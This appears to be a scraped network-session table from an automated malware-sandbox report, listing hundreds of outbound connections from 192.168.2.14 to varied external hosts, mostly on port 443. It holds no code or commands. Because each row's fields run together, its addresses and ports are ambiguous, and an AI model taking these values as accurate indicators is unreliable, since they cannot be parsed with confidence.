                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14935192.168.2.144662675.234.74.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14936192.168.2.1442582119.209.216.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14937192.168.2.144698871.246.31.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14938192.168.2.144817878.88.116.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14939192.168.2.1451442111.236.221.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14940192.168.2.1460394198.145.23.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14941192.168.2.144301643.158.244.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14942192.168.2.1457006162.19.200.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14943192.168.2.1433114120.31.20.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14944192.168.2.143639858.182.15.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14945192.168.2.1435610117.49.52.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14946192.168.2.143320862.36.227.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14947192.168.2.1445350136.202.49.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14948192.168.2.1449028105.155.2.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14949192.168.2.145629684.184.231.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14950192.168.2.1433482156.202.39.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14951192.168.2.1444766137.215.162.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14952192.168.2.143480240.149.132.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14953192.168.2.1441968126.253.204.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14954192.168.2.145175427.76.8.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14955192.168.2.1449586192.175.132.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14956192.168.2.1459080179.59.18.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14957192.168.2.143617038.38.229.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14958192.168.2.144723041.85.62.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14959192.168.2.144309286.179.215.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14960192.168.2.143290625.175.254.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14961192.168.2.1443970196.39.91.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14962192.168.2.1450194201.243.129.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14963192.168.2.1437096183.118.168.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14964192.168.2.1449606106.52.44.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14965192.168.2.144713086.29.178.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14966192.168.2.143766842.34.59.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14967192.168.2.1440312146.29.212.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14968192.168.2.145085680.118.25.211443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14969192.168.2.1460116176.132.102.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14970192.168.2.143374414.67.206.618080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14971192.168.2.1441412101.132.125.1608080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14972192.168.2.1444066134.79.229.1208080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14973192.168.2.1447282122.35.202.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14974192.168.2.143367058.201.198.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14975192.168.2.1459724201.79.79.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14976192.168.2.1438882105.112.46.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14977192.168.2.143680065.1.54.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14978192.168.2.1446362186.64.177.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14979192.168.2.144837262.122.180.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14980192.168.2.1450224107.232.44.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14981192.168.2.1437778144.232.252.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14982192.168.2.145637084.95.88.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14983192.168.2.1456558146.153.79.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14984192.168.2.145512859.202.58.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14985192.168.2.146072423.52.78.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14986192.168.2.143751647.175.251.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14987192.168.2.1458232154.69.189.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14988192.168.2.145612066.49.175.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14989192.168.2.1435902193.91.78.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14990192.168.2.145686434.139.90.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14991192.168.2.145733464.18.106.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14992192.168.2.1456408156.165.186.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14993192.168.2.1453508181.188.235.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14994192.168.2.1447898149.189.238.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14995192.168.2.1433360203.206.82.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14996192.168.2.144210619.239.177.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14997192.168.2.1433542161.191.156.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14998192.168.2.1436694130.154.223.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14999192.168.2.1440132110.44.71.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15000192.168.2.1445646118.185.64.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15001192.168.2.1448500162.29.178.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15002192.168.2.1450352218.219.9.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15003192.168.2.145305489.241.128.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15004192.168.2.1452448205.6.169.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15005192.168.2.145797013.181.130.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15006192.168.2.1448680172.66.63.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15007192.168.2.1447254146.127.81.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15008192.168.2.144978423.201.220.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15009192.168.2.14446405.36.177.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15010192.168.2.1447430157.245.238.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15011192.168.2.1438094223.96.224.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15012192.168.2.145008480.9.197.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15013192.168.2.1452612101.22.171.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15014192.168.2.1456496187.250.189.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15015192.168.2.145799420.88.210.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15016192.168.2.1448644112.16.178.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15017192.168.2.14331085.62.120.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15018192.168.2.144875068.198.246.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15019192.168.2.1443500211.51.136.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15020192.168.2.1459070118.40.84.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15021192.168.2.145144499.45.215.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15022192.168.2.1453014220.98.18.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15023192.168.2.1437512155.156.40.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15024192.168.2.145171045.208.102.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15025192.168.2.1434400132.29.159.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15026192.168.2.1443444145.7.231.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15027192.168.2.1438682173.138.229.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15028192.168.2.1448846204.132.158.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15029192.168.2.1441580135.220.239.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15030192.168.2.145913247.93.181.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15031192.168.2.14551568.105.142.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15032192.168.2.1456102156.92.106.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15033192.168.2.144567432.96.40.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15034192.168.2.1434164206.123.29.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15035192.168.2.143611247.21.86.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15036192.168.2.145977099.168.163.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15037192.168.2.1438994137.41.24.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15038192.168.2.1436062117.247.141.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15039192.168.2.1438472163.158.58.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15040192.168.2.145440696.63.207.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15041192.168.2.143408499.52.8.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15042192.168.2.1432918156.209.123.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15043192.168.2.1434016179.145.223.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15044192.168.2.145709295.144.183.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15045192.168.2.1440334175.139.39.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15046192.168.2.144008674.48.201.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15047192.168.2.143705444.126.179.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15048192.168.2.1438256142.57.224.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15049192.168.2.145467292.91.235.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15050192.168.2.1436544107.162.134.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15051192.168.2.144037442.156.110.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15052192.168.2.1444092212.126.46.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15053192.168.2.1451478146.81.110.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15054192.168.2.143834066.111.15.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15055192.168.2.143453647.202.3.117443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15056192.168.2.143456452.223.103.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15057192.168.2.145167035.237.54.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15058192.168.2.1456352216.187.160.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15059192.168.2.1452148146.221.35.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15060192.168.2.1453244146.109.197.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15061192.168.2.1452008106.222.41.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15062192.168.2.143748695.79.255.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15063192.168.2.1433378159.176.138.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15064192.168.2.1436138118.167.89.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15065192.168.2.1445820138.232.5.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15066192.168.2.144926051.195.10.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15067192.168.2.143436836.191.197.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15068192.168.2.143746883.233.235.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15069192.168.2.1458610205.226.159.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15070192.168.2.1440148116.62.122.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15071192.168.2.145217288.7.85.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15072192.168.2.1459564115.75.230.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15073192.168.2.144178077.113.185.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15074192.168.2.144717492.227.66.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15075192.168.2.143945832.149.50.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15076192.168.2.144062279.216.49.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15077192.168.2.1454494124.66.208.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15078192.168.2.1450294168.64.31.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15079192.168.2.1439732201.247.120.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15080192.168.2.1442848219.100.249.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15081192.168.2.145461867.202.150.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15082192.168.2.1446504105.72.207.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15083192.168.2.144507220.88.162.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15084192.168.2.1443192116.245.186.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15085192.168.2.1450952148.210.43.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15086192.168.2.145533278.154.117.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15087192.168.2.1443104219.58.120.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15088192.168.2.14471569.76.51.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15089192.168.2.14346044.1.7.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15090192.168.2.1433784205.53.154.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15091192.168.2.1436468205.249.35.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15092192.168.2.1443706123.89.129.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15093192.168.2.1459456194.199.131.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15094192.168.2.144933624.169.26.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15095192.168.2.143632053.115.154.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15096192.168.2.144086638.62.210.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15097192.168.2.1435186149.68.190.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15098192.168.2.1442254219.239.200.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15099192.168.2.1446834186.247.151.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15100192.168.2.1447406129.223.245.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15101192.168.2.1448482125.253.176.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15102192.168.2.1442018162.250.138.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15103192.168.2.144652254.55.157.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15104192.168.2.1457968193.243.157.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15105192.168.2.1446544169.176.165.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15106192.168.2.144071217.3.95.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15107192.168.2.145439419.17.110.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15108192.168.2.14368305.188.9.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15109192.168.2.1454842147.50.144.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15110192.168.2.144025847.193.175.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15111192.168.2.143474220.29.55.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15112192.168.2.1460278151.88.112.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15113192.168.2.1455110209.75.78.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15114192.168.2.144741818.170.190.206443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15115192.168.2.1438200218.250.22.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15116192.168.2.1442560130.237.221.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15117192.168.2.145783867.254.45.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15118192.168.2.1452508204.77.159.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15119192.168.2.1445336118.250.192.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15120192.168.2.1445110148.178.119.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15121192.168.2.1447644110.16.158.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15122192.168.2.146092618.194.216.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15123192.168.2.146076079.28.190.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15124192.168.2.145559623.163.168.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15125192.168.2.1439342174.71.158.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15126192.168.2.1432912218.133.57.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15127192.168.2.1436216108.158.67.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15128192.168.2.145840259.157.150.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15129192.168.2.143809254.214.255.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15130192.168.2.143667650.205.232.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15131192.168.2.145345242.44.253.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15132192.168.2.1436408191.155.67.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15133192.168.2.143678635.116.175.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15134192.168.2.1447320104.205.41.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15135192.168.2.1452558181.234.147.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15136192.168.2.144873270.97.195.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15137192.168.2.146037018.203.185.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15138192.168.2.1439452174.93.107.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15139192.168.2.1440814217.68.93.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15140192.168.2.143905470.45.140.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15141192.168.2.144635632.117.171.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15142192.168.2.1442934152.33.12.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15143192.168.2.143422896.102.117.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15144192.168.2.144847454.34.26.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15145192.168.2.1438168207.252.36.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15146192.168.2.1457042132.159.246.238443
                                                      TimestampBytes transferredDirectionData


